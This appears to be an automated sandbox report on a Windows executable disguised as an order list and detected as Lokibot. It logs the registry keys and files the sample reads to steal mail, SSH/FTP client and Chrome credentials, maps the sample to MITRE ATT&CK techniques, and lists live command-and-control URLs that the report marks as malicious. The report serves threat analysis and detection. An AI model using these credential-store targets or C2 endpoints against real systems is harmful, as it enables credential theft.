Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation

Source: C:\Users\user\Desktop\ORDER LIST790.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ORDER LIST790.exe PID: 1672, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\ORDER LIST790.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\ORDER LIST790.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\ORDER LIST790.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\ORDER LIST790.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\ORDER LIST790.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match	File source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	111 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	1 Input Capture	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	1 Credentials in Registry	1 Remote System Discovery	SMB/Windows Admin Shares	11 Archive Collected Data	Automated Exfiltration	111 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	13 System Information Discovery	Distributed Component Object Model	2 Data from Local System	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Download
4.0.ORDER LIST790.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.ORDER LIST790.exe.470c248.8.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.ORDER LIST790.exe.4726268.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://philiphanson.org/medius/book/1.0	0%	Avira URL Cloud	safe
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://philiphanson.org/medius/temp-transform	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://66.29.145.162/?112233	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown
http://66.29.145.162/?112233	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://apache.org	ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://philiphanson.org/medius/book/1.0	ORDER LIST790.exe	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://philiphanson.org/medius/temp-transform	ORDER LIST790.exe	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.centos.org/	ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	false		high
